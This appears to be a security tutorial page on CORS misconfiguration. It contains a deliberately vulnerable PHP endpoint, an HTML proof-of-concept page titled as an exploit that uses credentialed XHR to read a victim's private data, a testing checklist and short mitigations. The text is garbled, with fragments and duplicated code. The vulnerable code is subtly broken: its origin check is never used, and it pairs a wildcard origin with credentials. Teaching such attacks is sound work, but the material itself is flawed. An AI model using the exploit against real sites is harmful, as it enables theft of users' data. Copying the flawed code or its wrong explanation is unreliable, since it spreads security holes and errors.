CORS Attack

ow HTTP Headers

Access-Control-Allow: * or <origin> or null

Access-Control-Credentials:

if Access Access-Control-Credentials: true

is Vulnerable CORS

<?php
session_start();

if($_SESSION['islogin'] != 1){
	header("Location: login.php");
	die();
}
#vulnerablity here
$origin = "mydomain.com";
if ( strpos(@$_SERVER['HTTP_ORIGIN'], "mydomain.com") ){
	$origin = @$_SERVER['HTTP_ORIGIN'];
}

header("Content-Type: application/json");
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Credentials: true");

echo '{"name":"Guest user", "phone number":"0234235","email":"email@gmail.com","adddress":"street 3","own books":["Book one","Book two","Book three"],"private books":["book 4","book 5"]}';

POS (if data json use Content-Type = application/json)

<!DOCTYPE html>
<html>
<head>
    <script>
        function cors() {
            var xhttp = new XMLHttpRequest();
            url = "<url>";
            xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    // Display the response in an alert
                    alert(this.responseText);
                    // Or display the response in the demo div
                    document.getElementById("demo").innerHTML = this.responseText;
                }
            };
            xhttp.open("GET", url, true);
            xhttp.withCredentials = true;
            xhttp.send();
        }
    </script>
</head>
<body>
    <center>
        <h2>CORS PoC Exploit</h2>
        <div id="demo">
            <button type="button" onclick="cors()">Exploit</button>
        </div>
    </center>
</body>
</html>

I will try to find this vuln Uing Burpsuit Come with me!

in this request allow credentials if

Testing For CORS Vulnerabilities

remove/add a domain or like attckerlocalhost

Map the application • Test the application for dynamic generation • Does it reflect the user-supplied ACAO header? • Does it only validate on the start/end of a specific string? • Does it allow the null origin? * or yourdoamin,com • Does it restrict the protocol? HTTP or https | 80,8080 or any think • Does it allow credentials?

Click exploit B000000000M!

Mitigation

1. restrict Allowed Origins

2. Limit HTTP Methods

Access-control-Allow-Methods: GET, POST

3. Control Allowed Header

Access-Control-Allow-Headers: Content-Type, Authorization

Access-Control-Allow-Credentials: true
Validate Input and Origin
Content security Policy (CSP)

PreviousXSS_HTML Injection NextClickjacking

Last updated 8 months ago

<?php session_start(); if($_SESSION['islogin'] != 1){ header("Location: login.php"); die(); } #vulnerablity here $origin = "mydomain.com"; if ( strpos(@$_SERVER['HTTP_ORIGIN'], "mydomain.com") ){ $origin = @$_SERVER['HTTP_ORIGIN']; } header("Content-Type: application/json"); header("Access-Control-Allow-Origin: *"); header("Access-Control-Allow-Credentials: true"); echo '{"name":"Guest user", "phone number":"0234235","email":"email@gmail.com","adddress":"street 3","own books":["Book one","Book two","Book three"],"private books":["book 4","book 5"]}';

<!DOCTYPE html> <html> <head> <script> function cors() { var xhttp = new XMLHttpRequest(); url = "<url>"; xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { // Display the response in an alert alert(this.responseText); // Or display the response in the demo div document.getElementById("demo").innerHTML = this.responseText; } }; xhttp.open("GET", url, true); xhttp.withCredentials = true; xhttp.send(); } </script> </head> <body> <center> <h2>CORS PoC Exploit</h2> <div id="demo"> <button type="button" onclick="cors()">Exploit</button> </div> </center> </body> </html>